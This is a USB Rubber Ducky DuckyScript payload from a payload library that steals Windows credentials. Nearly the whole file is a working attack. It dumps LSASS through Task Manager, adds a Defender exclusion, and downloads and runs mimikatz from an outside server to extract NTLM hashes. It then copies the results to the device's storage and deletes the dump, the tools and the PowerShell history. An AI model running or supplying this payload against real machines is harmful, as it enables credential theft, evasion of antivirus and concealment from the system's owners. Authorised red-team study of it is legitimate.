Path: blob/master/payloads/library/exfiltration/ExfiltrateWindowsCredentials/PhysicalMedium/payload.txt
2971 views
REM Title: DuckyScript payload for data exfiltration over a physical medium1REM Author: jakobfriedl2ATTACKMODE HID STORAGE34REM OS Detection to ensure the target is Windows5EXTENSION PASSIVE_WINDOWS_DETECT6REM VERSION 1.17REM AUTHOR: Korben89REM CONFIGURATION:10DEFINE #MAX_WAIT 15011DEFINE #CHECK_INTERVAL 2012DEFINE #WINDOWS_HOST_REQUEST_COUNT 213DEFINE #NOT_WINDOWS 71415$_OS = #NOT_WINDOWS1617VAR $MAX_TRIES = #MAX_WAIT18WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))19DELAY #CHECK_INTERVAL20$MAX_TRIES = ($MAX_TRIES - 1)21END_WHILE22IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN23$_OS = WINDOWS24END_IF25END_EXTENSION2627IF ($_OS != WINDOWS)28LED_R29STOP_PAYLOAD30END_IF3132REM Define the URL of the server hosting the mimikatz executable33DEFINE #SERVER_URL http://XXX.XXX.XXX.XXX3435DELAY 100036REM Delete existing dump file37GUI r38DELAY 20039STRINGLN powershell "rm $env:TEMP\lsass.DMP"40DELAY 2004142REM Create lsass-dump using the TaskManager43GUI r44DELAY 20045STRING taskmgr46CTRL-SHIFT ENTER47DELAY 50048ALT y49DELAY 50050DOWNARROW51DELAY 100052STRING lsass53DELAY 50054SHIFT F1055$I = 056WHILE ($I < 5)57UPARROW58$I = ($I + 1)59END_WHILE60ENTER61DELAY 50062ENTER63ALT F46465REM Add exclusion path to the Windows Defender settings66GUI r67DELAY 20068STRING powershell.exe69CTRL-SHIFT ENTER70DELAY 50071ALT y72DELAY 50073STRINGLN if((Get-MpComputerStatus).RealTimeProtectionEnabled){Set-MpPreference -ExclusionPath $env:TEMP}7475REM Download mimikatz.exe from webserver76STRINGLN wget #SERVER_URL/mimikatz.exe -o $env:TEMP\mimikatz.exe77DELAY 10007879REM Execute mimikatz and the necessary commands80STRINGLN cd $env:TEMP81STRINGLN .\mimikatz.exe "privilege::debug"82STRINGLN log exfiltration.log83STRINGLN sekurlsa::minidump lsass.DMP84STRINGLN sekurlsa::logonpasswords85DELAY 500086CTRL c87DELAY 5008889REM Format mimikatz-log for exfiltration90STRINGLN cat .\exfiltration.log | Select-String -Pattern "NTLM" -Context 2,0 | Get-Unique > credentials.txt9192REM Getting the drive letter of the USB Rubber Ducky93STRINGLN $d=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter9495REM Creating a directory on the USB Rubber Ducky to store the files96DEFINE #exfil_dir $d':/'$env:COMPUTERNAME'-exfiltration-data'97STRING mkdir98SPACE99STRINGLN #exfil_dir100101REM Exfiltration102STRING mv -Force $env:TEMP\exfiltration.log103SPACE104STRINGLN #exfil_dir105DELAY 1000106STRING mv -Force $env:TEMP\credentials.txt107SPACE108STRINGLN #exfil_dir109110REM Clean-up111STRINGLN rm $env:TEMP\lsass.DMP112STRINGLN rm $env:TEMP\mimikatz.exe113STRINGLN Remove-MpPreference -ExclusionPath $env:TEMP114STRINGLN Clear-Variable -Name d115STRINGLN rm (Get-PSReadLineOption).HistorySavePath116117